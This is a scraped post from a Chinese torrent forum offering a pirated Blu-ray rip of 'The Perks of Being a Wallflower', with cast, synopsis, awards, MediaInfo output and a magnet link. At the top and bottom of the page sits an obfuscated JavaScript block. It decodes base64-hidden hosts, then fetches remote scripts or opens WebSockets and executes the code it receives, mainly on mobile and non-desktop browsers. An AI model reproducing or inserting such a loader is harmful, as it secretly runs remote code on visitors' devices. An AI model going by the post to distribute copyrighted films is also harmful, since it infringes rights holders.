壁花少年[中文字幕].The.Perks.of.Being.a.Wallflower.2012.1080p.BluRay.x265.10bit.DTS-bt9527.cc 16.77GB

版主小s 16天前 182

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 壁花少年 / 少年自读日记(港) / 壁花男孩(台) / 壁花之巅

◎片 名 The Perks of Being a Wallflower

◎年 代 2012

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 2012-09-08(多伦多电影节) / 2012-09-21(美国)

◎IMDb链接 https://www.imdb.com/title/tt1659337/

◎豆瓣评分 8.0/10 (182137人评价)

◎豆瓣链接 https://movie.douban.com/subject/4847665/

◎片 长 102分钟

◎导 演 斯蒂芬·卓博斯基 Stephen Chbosky (id:1070754)

◎编 剧 斯蒂芬·卓博斯基 Stephen Chbosky (id:1070754)

◎演 员 罗根·勒曼 Logan Lerman (id:1053583)

艾玛·沃森 Emma Watson (id:1053624)

埃兹拉·米勒 Ezra Miller (id:1313037)

妮娜·杜波夫 Nina Dobrev (id:1013763)

保罗·路德 Paul Rudd (id:1002667)

梅·惠特曼 Mae Whitman (id:1017892)

迪伦·麦克德莫特 Dylan McDermott (id:1040567)

凯特·沃什 Kate Walsh (id:1027806)

梅兰妮·林斯基 Melanie Lynskey (id:1044729)

约翰尼·西蒙斯 Johnny Simmons (id:1036412)

布莱恩·巴尔泽里尼 Brian Balzerini (id:1271412)

尼可拉斯·博朗 Nicholas Braun (id:1044923)

朱莉娅·加纳 Julia Garner (id:1327285)

汤姆·萨维尼 Tom Savini (id:1041207)

切尔西·张 Chelsea Zhang (id:1337082)

亚当·哈根布奇 Adam Hagenbuch (id:1354717)

埃林·维赫米 Erin Wilhelmi (id:1325940)

Jordan Paley (id:1228722)

里斯·汤普森 Reece Thompson (id:1040725)

赞恩·霍尔茨 Zane Holtz (id:1188997)

Atticus Cain Atticus Cain (id:1218022)

Dihlon McManne Dihlon McManne (id:1124198)

兰登·皮格 Landon Pigg (id:1245518)

珍妮弗·恩斯卡特 Jennifer Enskat (id:1375134)

琼·库萨克 Joan Cusack (id:1027139)

欧文·坎贝尔 Owen Campbell (id:1313218)

Rick Dawson (id:1266319)

Pat Frey (id:1265244)

威廉·卡尼亚 William Kania (id:1216458)

Brenden Meers (id:1230414)

杰瑞米·穆恩 Jeremy Moon (id:1267539)

布莱恩·穆勒 Brian Muller (id:1353058)

亚历山大·罗德斯 Alexander Rhodes (id:1324275)

约翰·马尔科维奇 John Malkovich (id:1041013)

斯蒂芬·卓博斯基 Stephen Chbosky (id:1070754)

利安妮·哈尔丰 Lianne Halfon (id:1023509)

罗素·史密斯 Russell Smith (id:1157667)

◎标 签 青春 / 成长 / 美国 / EmmaWatson / 爱情 / 美国电影 / 剧情 / 2012

◎简 介

查理(罗根·勒曼 Logan Lerman 饰)是个害羞和孤独的高中新生,拥有超越年龄的敏感和泪腺,总是默默观察身边的家人和朋友,是个典型的「壁花少年」。他的青春期充满各种挫折,先后经历了阿姨为给他买生日礼物去世、最好朋友自杀、受同侪排挤欺负、单恋没有回应等各种事情。然而查理还不是最惨的,因为和他一样被生活逼入墙角罚站的人实在太多。他幸运的拥有一个开明的老师和两个高年级的好友:叛逆娇俏的少女珊(艾玛·沃森 Emma Watson 饰)和自信满满的同志男生帕特里克(埃兹拉·米勒 Ezra Miller 饰),他们让查理明白了有时候不能永远旁观,必须要参与进来才能拥有属于自己的精彩。

《壁花少年》改编自同名畅销原著,由作者史蒂芬·克伯斯基自编自导,《朱诺》原班监制倾力打造,集合90后一众人气偶像,在自杀、霸凌、性向、毒品等诸多敏感争议的话题中,书写一篇献...

◎获奖情况 (共30项)

第22届MTV电影奖 (2013)

MTV电影奖 最佳女演员(提名)

└──艾玛·沃森 (id:1053624)

MTV电影奖 突破表演奖(提名)

└──埃兹拉·米勒 (id:1313037)

MTV电影奖 最佳吻戏(提名)

MTV电影奖 最佳音乐场景(提名)

第84届美国国家评论协会奖 (2013)

年度佳片

第18届美国评论家选择电影奖 (2013)

最佳青少年演员(提名)

└──罗根·勒曼 (id:1053583)

最佳改编剧本(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

第28届美国独立精神奖 (2013)

最佳处女作

第11届华盛顿影评人协会奖 (2012)

最佳改编剧本(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

第33届波士顿影评人协会奖 (2012)

最佳男配角

└──埃兹拉·米勒 (id:1313037)

最佳女配角(提名)

└──艾玛·沃森 (id:1053624)

第17届圣地亚哥影评人协会奖 (2012)

最佳女配角

└──艾玛·沃森 (id:1053624)

最佳改编剧本(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

最佳群像表演(提名)

第25届芝加哥影评人协会奖 (2012)

最佳改编剧本(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

最具潜力导演(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

第12届凤凰城影评人协会奖 (2012)

最佳男配角(提名)

└──埃兹拉·米勒 (id:1313037)

最佳女配角(提名)

└──艾玛·沃森 (id:1053624)

最佳改编剧本(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

年度被忽略影片(提名)

最佳新人导演(提名)

└──斯蒂芬·卓博斯基 (id:1070754)

第15届美国青少年选择奖 (2013)

最佳剧情片

最佳剧情片男演员

└──罗根·勒曼 (id:1053583)

最佳剧情片女演员

└──艾玛·沃森 (id:1053624)

最佳突破表演电影新星(提名)

└──埃兹拉·米勒 (id:1313037)

最佳电影吻戏(提名)

第3届豆瓣电影鑫像奖 (2013)

鑫豆单元 最佳女演员(外语)(提名)

└──艾玛·沃森 (id:1053624)

鑫豆单元 最佳配乐(提名)

鑫豆单元 最佳歌曲(提名)

鑫豆单元 最佳落选影片

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 18299513853933736564490427284843501226 (0xDC45BB105CF86402D97E4E6469196AA)

  4. Complete name : The.Per[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 16.8 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate : 23.4 Mb/s

  10. Encoded date : UTC 2021-11-15 06:46:16

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video #1

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 42 min

  20. Bit rate : 8 390 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.169

  30. Stream size : 6.02 GiB (36%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=20.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Video #2

  37. ID : 2

  38. Format : AVC

  39. Format/Info : Advanced Video Codec

  40. Format profile : [email protected]

  41. Format settings : CABAC / 4 Ref Frames

  42. Format settings, CABAC : Yes

  43. Format settings, Reference frames : 4 frames

  44. Codec ID : V_MPEG4/ISO/AVC

  45. Duration : 1 h 42 min

  46. Bit rate : 13.4 Mb/s

  47. Width : 1 920 pixels

  48. Height : 1 080 pixels

  49. Display aspect ratio : 16:9

  50. Frame rate mode : Constant

  51. Frame rate : 23.976 (24000/1001/53354) FPS

  52. Color space : YUV

  53. Chroma subsampling : 4:2:0

  54. Bit depth : 8 bits

  55. Scan type : Progressive

  56. Bits/(Pixel*Frame) : 0.269

  57. Stream size : 9.59 GiB (57%)

  58. Writing library : x264 core 164 r3075+55M 97d28bb t_mod_New [(8 & 10)[email protected] X86_64]

  59. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=21.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  60. Language : English

  61. Default : No

  62. Forced : No


  63. Audio

  64. ID : 3

  65. ID in the original source medium : 4352 (0x1100)

  66. Format : DTS

  67. Format/Info : Digital Theater Systems

  68. Codec ID : A_DTS

  69. Duration : 1 h 42 min

  70. Bit rate mode : Constant

  71. Bit rate : 1 509 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : C L R Ls Rs LFE

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 93.750 FPS (512 SPF)

  76. Bit depth : 24 bits

  77. Compression mode : Lossy

  78. Stream size : 1.08 GiB (6%)

  79. Language : English

  80. Default : Yes

  81. Forced : No

  82. Original source medium : Blu-ray


  83. Text #1

  84. ID : 4

  85. ID in the original source medium : 4611 (0x1203)

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 37 min

  91. Bit rate : 52.8 kb/s

  92. Count of elements : 2372

  93. Stream size : 37.0 MiB (0%)

  94. Language : Chinese

  95. Default : Yes

  96. Forced : No

  97. Original source medium : Blu-ray


  98. Text #2

  99. ID : 5

  100. ID in the original source medium : 4612 (0x1204)

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 37 min

  106. Bit rate : 53.0 kb/s

  107. Count of elements : 2372

  108. Stream size : 37.2 MiB (0%)

  109. Language : Chinese

  110. Default : No

  111. Forced : No

  112. Original source medium : Blu-ray


  113. Text #3

  114. ID : 6

  115. ID in the original source medium : 4613 (0x1205)

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 37 min

  121. Bit rate : 29.4 kb/s

  122. Count of elements : 2372

  123. Stream size : 20.6 MiB (0%)

  124. Language : Chinese

  125. Default : No

  126. Forced : No

  127. Original source medium : Blu-ray


  128. Text #4

  129. ID : 7

  130. ID in the original source medium : 4614 (0x1206)

  131. Format : PGS

  132. Muxing mode : zlib

  133. Codec ID : S_HDMV/PGS

  134. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  135. Duration : 1 h 37 min

  136. Bit rate : 29.7 kb/s

  137. Count of elements : 2372

  138. Stream size : 20.8 MiB (0%)

  139. Language : Chinese

  140. Default : No

  141. Forced : No

  142. Original source medium : Blu-ray


  143. Text #5

  144. ID : 8

  145. ID in the original source medium : 4608 (0x1200)

  146. Format : PGS

  147. Muxing mode : zlib

  148. Codec ID : S_HDMV/PGS

  149. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  150. Duration : 1 h 36 min

  151. Bit rate : 60.1 kb/s

  152. Count of elements : 2939

  153. Stream size : 41.5 MiB (0%)

  154. Language : English

  155. Default : No

  156. Forced : No

  157. Original source medium : Blu-ray


  158. Menu

  159. 00:00:00.000 : en:第 01 章

  160. 00:05:04.387 : en:第 02 章

  161. 00:10:24.624 : en:第 03 章

  162. 00:17:06.984 : en:第 04 章

  163. 00:21:38.005 : en:第 05 章

  164. 00:28:31.501 : en:第 06 章

  165. 00:33:09.070 : en:第 07 章

  166. 00:39:55.351 : en:第 08 章

  167. 00:47:17.000 : en:第 09 章

  168. 00:54:38.858 : en:第 10 章

  169. 00:58:15.950 : en:第 11 章

  170. 01:03:17.960 : en:第 12 章

  171. 01:10:13.125 : en:第 13 章

  172. 01:18:31.790 : en:第 14 章

  173. 01:23:11.611 : en:第 15 章

  174. 01:31:12.383 : en:第 16 章




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:36F73177A6769F492088783F6778E37F9925B61D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};